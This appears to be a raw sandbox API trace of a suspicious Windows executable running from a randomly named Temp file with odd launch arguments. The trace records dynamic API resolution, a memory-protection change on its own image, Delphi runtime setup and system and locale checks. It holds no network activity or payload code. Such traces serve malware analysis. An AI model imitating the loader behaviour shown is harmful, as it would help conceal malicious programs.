[0116.995] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessId") returned 0x7695cac4 [0116.995] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcess") returned 0x7695cdcf [0116.996] GetProcAddress (hModule=0x76910000, lpProcName="GetComputerNameA") returned 0x76946ba9 [0116.996] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfoExW") returned 0x76948b1b [0116.996] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfo") returned 0x76961e2e [0116.996] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0116.996] GetProcAddress (hModule=0x76910000, lpProcName="FreeResource") returned 0x7694f1bd [0116.996] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedCompareExchange") returned 0x7695bb92 [0116.996] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0116.996] GetProcAddress (hModule=0x76910000, lpProcName="FormatMessageW") returned 0x769554a3 [0116.996] GetProcAddress (hModule=0x76910000, lpProcName="FindResourceW") returned 0x76953e61 [0116.996] GetProcAddress (hModule=0x76910000, lpProcName="FindNextFileW") returned 0x7695963a [0116.996] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0116.996] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0116.996] GetProcAddress (hModule=0x76910000, lpProcName="ExpandEnvironmentStringsW") returned 0x76954680 [0116.997] GetProcAddress (hModule=0x76910000, lpProcName="EnumSystemLocalesW") returned 0x7699f3df [0116.997] GetProcAddress (hModule=0x76910000, lpProcName="EnumCalendarInfoW") returned 0x7699f38f [0116.997] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0116.997] GetProcAddress (hModule=0x76910000, lpProcName="DeleteFileW") returned 0x76950f62 [0116.997] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0116.997] GetProcAddress (hModule=0x76910000, 
lpProcName="CreateProcessW") returned 0x7691204d [0116.997] GetProcAddress (hModule=0x76910000, lpProcName="CreateMutexW") returned 0x76952aee [0116.997] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileW") returned 0x7695cc56 [0116.997] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventW") returned 0x76963386 [0116.997] GetProcAddress (hModule=0x76910000, lpProcName="CreateDirectoryW") returned 0x76953925 [0116.997] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileW") returned 0x769467c3 [0116.997] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0116.997] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0116.997] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0116.997] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0116.998] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0116.998] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0116.998] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0116.998] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0116.998] GetProcAddress (hModule=0x76910000, lpProcName="lstrlenW") returned 0x7695d9e8 [0116.998] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0116.998] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0116.998] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0116.998] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemInfo") returned 0x76963728 [0116.998] GetProcAddress (hModule=0x76910000, lpProcName="GetVersion") returned 0x7695154e [0116.998] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0116.998] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0116.998] 
GetProcAddress (hModule=0x76910000, lpProcName="SetThreadLocale") returned 0x769788e6 [0116.998] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemDefaultUILanguage") returned 0x7694731d [0116.998] GetProcAddress (hModule=0x76910000, lpProcName="GetUserDefaultUILanguage") returned 0x769522ef [0116.998] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="MultiByteToWideChar") returned 0x7696452b [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryExW") returned 0x76954775 [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="GetStartupInfoW") returned 0x76963891 [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineW") returned 0x7696679e [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="UnhandledExceptionFilter") returned 0x7696ed38 [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="RtlUnwind") returned 0x76947f70 [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="ExitProcess") returned 0x7696214f [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="ExitThread") returned 0x7725f611 [0116.999] GetProcAddress (hModule=0x76910000, 
lpProcName="SwitchToThread") returned 0x7694eb24 [0116.999] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="CreateThread") returned 0x7696375d [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0117.000] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryA") returned 0x7696395c [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="TlsSetValue") returned 0x7695da88 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="TlsGetValue") returned 0x7695da70 [0117.000] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0117.001] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0117.001] GetProcAddress (hModule=0x76910000, 
lpProcName="GetModuleHandleW") returned 0x7696374d [0117.001] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0117.001] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0117.001] GetProcAddress (hModule=0x769f0000, lpProcName="OpenThreadToken") returned 0x76a0432c [0117.001] GetProcAddress (hModule=0x769f0000, lpProcName="OpenProcessToken") returned 0x76a04304 [0117.001] GetProcAddress (hModule=0x769f0000, lpProcName="GetUserNameA") returned 0x76a1a4b4 [0117.001] GetProcAddress (hModule=0x769f0000, lpProcName="GetTokenInformation") returned 0x76a0431c [0117.001] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthorityCount") returned 0x76a00e0c [0117.001] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthority") returned 0x76a00e24 [0117.001] GetProcAddress (hModule=0x769f0000, lpProcName="FreeSid") returned 0x76a0412e [0117.001] GetProcAddress (hModule=0x769f0000, lpProcName="EqualSid") returned 0x76a0410b [0117.001] GetProcAddress (hModule=0x769f0000, lpProcName="AllocateAndInitializeSid") returned 0x76a040e6 [0117.001] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0117.001] GetProcAddress (hModule=0x769f0000, lpProcName="RegQueryValueExW") returned 0x76a046ad [0117.001] GetProcAddress (hModule=0x769f0000, lpProcName="RegOpenKeyExW") returned 0x76a0468d [0117.002] GetProcAddress (hModule=0x769f0000, lpProcName="RegCloseKey") returned 0x76a0469d [0117.002] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0117.002] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0117.002] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0117.002] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0117.002] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76750000 [0117.002] GetProcAddress (hModule=0x76750000, lpProcName="CoTaskMemFree") returned 
0x767a6f41 [0117.002] GetProcAddress (hModule=0x76750000, lpProcName="StringFromCLSID") returned 0x7676eb17 [0117.002] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstance") returned 0x76799d0b [0117.002] GetProcAddress (hModule=0x76750000, lpProcName="CoUninitialize") returned 0x767986d3 [0117.002] GetProcAddress (hModule=0x76750000, lpProcName="CoInitialize") returned 0x7676b636 [0117.002] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0117.002] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayPtrOfIndex") returned 0x76c2e1ce [0117.002] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetUBound") returned 0x76c2e127 [0117.002] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetLBound") returned 0x76c2e173 [0117.002] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayCreate") returned 0x76c2e263 [0117.002] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeType") returned 0x76c15dee [0117.002] GetProcAddress (hModule=0x76c10000, lpProcName="VariantCopy") returned 0x76c148f1 [0117.002] GetProcAddress (hModule=0x76c10000, lpProcName="VariantClear") returned 0x76c13eae [0117.003] GetProcAddress (hModule=0x76c10000, lpProcName="VariantInit") returned 0x76c13ed5 [0117.003] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0117.003] GetProcAddress (hModule=0x76c10000, lpProcName="GetErrorInfo") returned 0x76c13f21 [0117.003] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0117.003] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0117.003] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0117.003] GetProcAddress (hModule=0x76c10000, lpProcName="SysReAllocStringLen") returned 0x76c17810 [0117.003] GetProcAddress (hModule=0x76c10000, lpProcName="SysAllocStringLen") returned 0x76c145d2 [0117.003] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75830000 [0117.003] GetProcAddress 
(hModule=0x75830000, lpProcName="SHGetSpecialFolderPathW") returned 0x75850468 [0117.003] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0117.003] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0117.003] GetProcAddress (hModule=0x76b40000, lpProcName="CharNextW") returned 0x76b50be6 [0117.003] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0117.003] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0117.003] GetProcAddress (hModule=0x76b40000, lpProcName="PeekMessageW") returned 0x76b5634a [0117.003] GetProcAddress (hModule=0x76b40000, lpProcName="MsgWaitForMultipleObjects") returned 0x76b537d8 [0117.003] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxW") returned 0x76b9ea5f [0117.004] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0117.004] GetProcAddress (hModule=0x76b40000, lpProcName="GetSystemMetrics") returned 0x76b567cf [0117.004] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperBuffW") returned 0x76b5ebd5 [0117.004] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperW") returned 0x76b5e981 [0117.004] GetProcAddress (hModule=0x76b40000, lpProcName="CharLowerBuffW") returned 0x76b53afe [0117.004] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x40) returned 1 [0117.004] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x4) returned 1 [0117.004] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0117.004] SetThreadLocale (Locale=0x400) returned 1 [0117.005] GetVersion () returned 0x1db10106 [0117.005] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0117.005] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPreferredUILanguages") returned 0x769522d7 [0117.005] GetModuleHandleW (lpModuleName="kernel32.dll") 
returned 0x76910000 [0117.005] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPreferredUILanguages") returned 0x7694e627 [0117.005] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0117.005] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadUILanguage") returned 0x7694ae42 [0117.005] GetSystemInfo (in: lpSystemInfo=0x12fc34 | out: lpSystemInfo=0x12fc34*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0117.005] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0117.005] GetStartupInfoW (in: lpStartupInfo=0x12fc10 | out: lpStartupInfo=0x12fc10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0117.005] GetACP () returned 0x4e4 [0117.005] GetCurrentThreadId () returned 0xe60 [0117.005] GetVersion () returned 0x1db10106 [0117.005] GetVersionExW (in: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7728f879, dwMinorVersion=0x7728f99a, dwBuildNumber=0x711cb0, dwPlatformId=0x12fbaa, szCSDVersion="") | out: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0117.006] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x12da00, nSize=0x20a | out: 
lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe")) returned 0x30 [0117.006] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12d7ea, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe")) returned 0x30 [0117.006] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x520000 [0117.006] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0117.006] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0117.006] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0117.006] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0117.006] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0117.006] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0117.006] GetUserDefaultUILanguage () returned 0x409 [0117.007] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0117.007] GetThreadUILanguage () returned 0x120409 [0117.007] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, 
pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768) returned 1 [0117.008] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x64a680, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x64a680, pcchLanguagesBuffer=0x12d768) returned 1 [0117.008] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.en-US", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0117.008] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.en", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0117.008] GetUserDefaultUILanguage () returned 0x409 [0117.008] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x12d784, cchData=4 | out: lpLCData="ENU") returned 4 [0117.008] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.ENU", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0117.009] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.EN", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0117.009] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c 
[0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Access violation") 
returned 0x10 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0117.093] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0117.094] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0117.094] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0117.094] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0117.094] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0117.094] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0117.094] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0117.094] GetVersionExW (in: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0117.094] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0117.094] 
LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x724438 [0117.094] GetProcAddress (hModule=0x76910000, lpProcName="GetNativeSystemInfo") returned 0x7694be77 [0117.094] GetNativeSystemInfo (in: lpSystemInfo=0x12fb1c | out: lpSystemInfo=0x12fb1c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0117.094] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0117.094] LoadStringW (in: hInstance=0x400000, uID=0xff6b, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0117.094] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0117.094] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0117.094] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0117.094] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0117.094] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0117.094] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0117.094] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0117.094] GetVersionExW (in: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, 
dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0117.095] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0117.095] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0117.095] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x6180dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0117.095] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceExW") returned 0x7694de40 [0117.095] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa0a, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe")) returned 0x30 [0117.095] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0117.095] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 